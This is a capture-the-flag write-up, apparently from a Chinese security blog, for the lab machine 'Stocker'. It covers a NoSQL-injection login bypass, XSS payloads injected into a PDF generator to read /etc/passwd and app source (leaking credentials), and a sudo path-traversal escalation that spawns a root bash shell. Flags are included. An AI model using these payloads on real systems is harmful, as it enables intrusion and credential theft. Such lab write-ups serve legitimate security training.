[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升

2025-02-13 29 0

Information Gathering

IP Address Opening Ports
10.10.11.196 TCP:22,80

$ ip='10.10.11.196'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NOSQLI && PDF-XSS-LFI

# echo '10.10.11.196 stocker.htb' >>/etc/hosts

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图

# echo '10.10.11.196 dev.stocker.htb' >>/etc/hosts

http://dev.stocker.htb/login

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图1

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图2

Content-Type: application/json

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图3

应用使用了 MongoDB 或其他类似的 NoSQL 数据库,往往会以 JSON 或类似的格式与数据库进行交互,因此很有可能是使用了 NoSQL 数据库,如 MongoDB。

POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 44
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid=s%3AuHfFeLPGSEc-qATP1x8ZpvDMDTTh2SyF.GpEHRtc7UTTPI%2BNgRMpIzjDv%2BxO7AQkRUNu9Mq5TC5A
Upgrade-Insecure-Requests: 1

{"username":{"$ne":1},"password":{"$ne":1} }

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图4

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图5

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图6

POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: connect.sid=s%3AIJ_3Rtib4U9iyygfsOEt_uY6dpZp3FFc.h%2BYon1AR24qmHaPVmaeODrF%2Faav%2F%2Fe%2BdK22Vc%2BYmVRs
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 06 Dec 2022 09:53:59 GMT
If-None-Match: W/"2a9a-184e6db4279"
Content-Type: application/json
Content-Length: 392


{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "Cup<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(\"GET\",\"file:///etc/passwd\");x.send();</script>",
      "description": "xxxxx",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 2
    }
  ]
}

http://dev.stocker.htb/api/po/67a9a53e0e268a4cdd0b0bb9

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图7

读取配置文件

POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: connect.sid=s%3AIJ_3Rtib4U9iyygfsOEt_uY6dpZp3FFc.h%2BYon1AR24qmHaPVmaeODrF%2Faav%2F%2Fe%2BdK22Vc%2BYmVRs
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 06 Dec 2022 09:53:59 GMT
If-None-Match: W/"2a9a-184e6db4279"
Content-Type: application/json
Content-Length: 402


{
  "basket": [
    {
      "_id": "638f116eeb060210cbd83a8d",
      "title": "Cup<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(\"GET\",\"file:///var/www/dev/index.js\");x.send();</script>",
      "description": "xxxxx",
      "image": "red-cup.jpg",
      "price": 32,
      "currentStock": 4,
      "__v": 0,
      "amount": 2
    }
  ]
}

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图8

username:dev
password:IHeardPassphrasesArePrettySecure

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图9

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图10

User.txt

950316457d8a4004ed601c5ba7e0ca53

Privilege Escalation: * Bypass

[Meachines] [Easy] Stocker NOSQLI+PDF-XSS-LFI+*通配符Bypass权限提升插图11

$ echo 'require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'>/tmp/shell.js

$ sudo /usr/bin/node /usr/local/scripts/../../../tmp/shell.js

Root.txt

5fa73a7f3cabba1172cc894e1043f27b

相关文章:

  1. [Meachines] [Medium] Book SQLTA+PDF-XSS-File_Read+…
  2. [Meachines] [Medium] poison LFI+日志投毒+VNC权限提升
  3. [Meachines] [Easy] Pilgrimage .Git泄露+ImageMagick-LFI+binwalk-v2.3.2权限提升
  4. [Meachines] [Insane] Bankrobber XSS-MDOG+SQLI+XSRF…
  5. [Meachines] [Easy] Sea WonderCMS-XSS-RCE+System Mo…

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

Web应用&企业产权&域名资产&网络空间&威胁情报
【CTF】Python Jail沙箱逃逸手法总结 PyJail All in One
风投巨头Insight Partners遭遇网络攻击,敏感数据或泄露
网络犯罪转向社交媒体,攻击量达历史新高
雅虎数据泄露事件:黑客涉嫌兜售60.2万个电子邮件账户
黑客如何利用提示词工程操纵AI代理?

发布评论